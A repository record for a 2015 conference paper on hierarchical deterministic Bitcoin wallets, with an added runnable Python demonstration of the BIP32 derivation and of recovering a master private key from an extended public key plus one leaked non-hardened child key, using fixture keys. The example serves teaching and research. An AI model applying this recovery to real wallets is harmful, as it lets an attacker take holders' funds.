Hierarchical deterministic Bitcoin wallets that tolerate key leakage (short paper)

Gutoski, Gus & Stebila, Douglas (2015) Hierarchical deterministic Bitcoin wallets that tolerate key leakage (short paper). In Böhme, Rainer & Okamoto, Tatsuaki (Eds.) Financial Cryptography and Data Security: 19th International Conference, FC 2015, Revised Selected Papers [Lecture Notes in Computer Science, Volume 8975], Springer, San Juan, Puerto Rico, United States of America, pp. 497-504.

A Bitcoin wallet is a set of private keys known to a user and which allow that user to spend any Bitcoin associated with those keys. In a hierarchical deterministic (HD) wallet, child private keys are generated pseudorandomly from a master private key, and the corresponding child public keys can be generated by anyone with knowledge of the master public key. These wallets have several interesting applications including Internet retail, trustless audit, and a treasurer allocating funds among departments. A specification of HD wallets has even been accepted as Bitcoin standard BIP32.

Unfortunately, in all existing HD wallets---including BIP32 wallets---an attacker can easily recover the master private key given the master public key and any child private key. (In BIP32 terms this applies to every non-hardened child: hardened derivation avoids the recovery, but only by giving up the ability to derive child public keys from the master public key, which is exactly the property the applications above depend on.) This vulnerability precludes use cases such as a combined treasurer-auditor, and some in the Bitcoin community have suspected that it cannot be avoided.
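The derivation described in the two paragraphs above, and the recovery attack the abstract refers to, as an added worked example that is not code from the paper or from any wallet implementation. It follows the BIP32 child key derivation (CKDpriv/CKDpub) with a minimal pure-Python secp256k1 implementation so it runs offline; the master private key and chain code are constructed fixtures, not real wallet material. The point is in `recover_parent_priv`: for a non-hardened child the HMAC input is built only from the parent public key, the chain code and the index, so anyone holding the extended public key can compute I_L and subtract it from a leaked child private key.

```python
import hashlib
import hmac

# secp256k1 domain parameters (the curve used by Bitcoin and BIP32)
P = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFC2F
N = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141
G = (0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798,
     0x483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8)
HARDENED = 0x80000000  # BIP32: indices >= 2^31 are hardened children


def _point_add(a, b):
    """Affine point addition on secp256k1; None is the point at infinity."""
    if a is None:
        return b
    if b is None:
        return a
    (x1, y1), (x2, y2) = a, b
    if x1 == x2 and (y1 + y2) % P == 0:
        return None  # a == -b
    if a == b:
        lam = (3 * x1 * x1) * pow(2 * y1, -1, P) % P
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return (x3, (lam * (x1 - x3) - y1) % P)


def _point_mul(k, point=G):
    """Double-and-add scalar multiplication (not constant time; illustration only)."""
    result, addend = None, point
    while k:
        if k & 1:
            result = _point_add(result, addend)
        addend = _point_add(addend, addend)
        k >>= 1
    return result


def ser_p(point):
    """33-byte compressed SEC encoding of a point (BIP32's ser_P)."""
    x, y = point
    return bytes([2 + (y & 1)]) + x.to_bytes(32, "big")


def _hmac512(chain_code, data):
    """BIP32's I = HMAC-SHA512(Key = c_par, Data = data), split into (I_L as int, I_R)."""
    i = hmac.new(chain_code, data, hashlib.sha512).digest()
    return int.from_bytes(i[:32], "big"), i[32:]


def ckd_priv(k_par, c_par, index):
    """BIP32 CKDpriv: (k_par, c_par, i) -> (k_i, c_i). Hardened if index >= 2^31."""
    if index >= HARDENED:
        data = b"\x00" + k_par.to_bytes(32, "big") + index.to_bytes(4, "big")
    else:
        data = ser_p(_point_mul(k_par)) + index.to_bytes(4, "big")
    il, c_i = _hmac512(c_par, data)
    assert il < N, "invalid child; BIP32 says skip this index"  # negligible probability
    return (il + k_par) % N, c_i


def ckd_pub(K_par, c_par, index):
    """BIP32 CKDpub: (K_par, c_par, i) -> (K_i, c_i). Only defined for non-hardened i."""
    if index >= HARDENED:
        raise ValueError("hardened children cannot be derived from the public key")
    il, c_i = _hmac512(c_par, ser_p(K_par) + index.to_bytes(4, "big"))
    return _point_add(_point_mul(il), K_par), c_i


def recover_parent_priv(K_par, c_par, index, k_child):
    """The leakage attack: extended public key + one leaked child private key -> k_par.

    For a non-hardened child, I_L depends only on public data, so
    k_par = k_child - I_L (mod n). For a hardened child I_L is keyed on k_par
    itself, so this computation is unavailable and None is returned.
    """
    if index >= HARDENED:
        return None
    il, _ = _hmac512(c_par, ser_p(K_par) + index.to_bytes(4, "big"))
    return (k_child - il) % N


# Constructed fixture (not a real wallet): a master private key and chain code.
MASTER_PRIV = int.from_bytes(hashlib.sha256(b"example master seed, do not use").digest(), "big") % N
MASTER_CHAIN = hashlib.sha256(b"example chain code").digest()
MASTER_PUB = _point_mul(MASTER_PRIV)


def demo(index=7):
    """Derive child `index` via both paths, check they agree, then run the attack.

    Returns True iff the master private key is recovered from the master public
    key, the chain code and the child private key alone.
    """
    k_child, c_child = ckd_priv(MASTER_PRIV, MASTER_CHAIN, index)
    K_child, c_child_pub = ckd_pub(MASTER_PUB, MASTER_CHAIN, index)
    assert K_child == _point_mul(k_child) and c_child == c_child_pub
    return recover_parent_priv(MASTER_PUB, MASTER_CHAIN, index, k_child) == MASTER_PRIV


if __name__ == "__main__":
    print("non-hardened child 7 leaks master key:", demo(7))
    k_hard, _ = ckd_priv(MASTER_PRIV, MASTER_CHAIN, HARDENED + 7)
    print("hardened child recovery:", recover_parent_priv(MASTER_PUB, MASTER_CHAIN, HARDENED + 7, k_hard))
```

Note that the attack only needs the extended public key (point plus chain code), which BIP32 users routinely hand to auditors, web shops and accounting systems; one leaked non-hardened child key, at any depth below that xpub, then compromises everything under it.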

We propose a new HD wallet that is not subject to this vulnerability. Our HD wallet can tolerate the leakage of up to m private keys with a master public key size of O(m). We prove that breaking our HD wallet is at least as hard as the so-called "one more" discrete logarithm problem.


ID Code: 82221
Item Type: Conference Paper
Refereed: Yes
Keywords: Bitcoin
DOI: 10.1007/978-3-662-47854-7_31
ISBN: 978-3-662-47853-0
Subjects: Australian and New Zealand Standard Research Classification > INFORMATION AND COMPUTING SCIENCES (080000) > DATA FORMAT (080400) > Data Encryption (080402)
Divisions: Current > Schools > School of Electrical Engineering & Computer Science
Current > Institutes > Institute for Future Environments
Current > QUT Faculties and Divisions > Science & Engineering Faculty
Copyright Owner: Copyright 2015 International Financial Cryptography Association
Deposited On: 05 Mar 2015 23:23
Last Modified: 01 Dec 2015 08:49
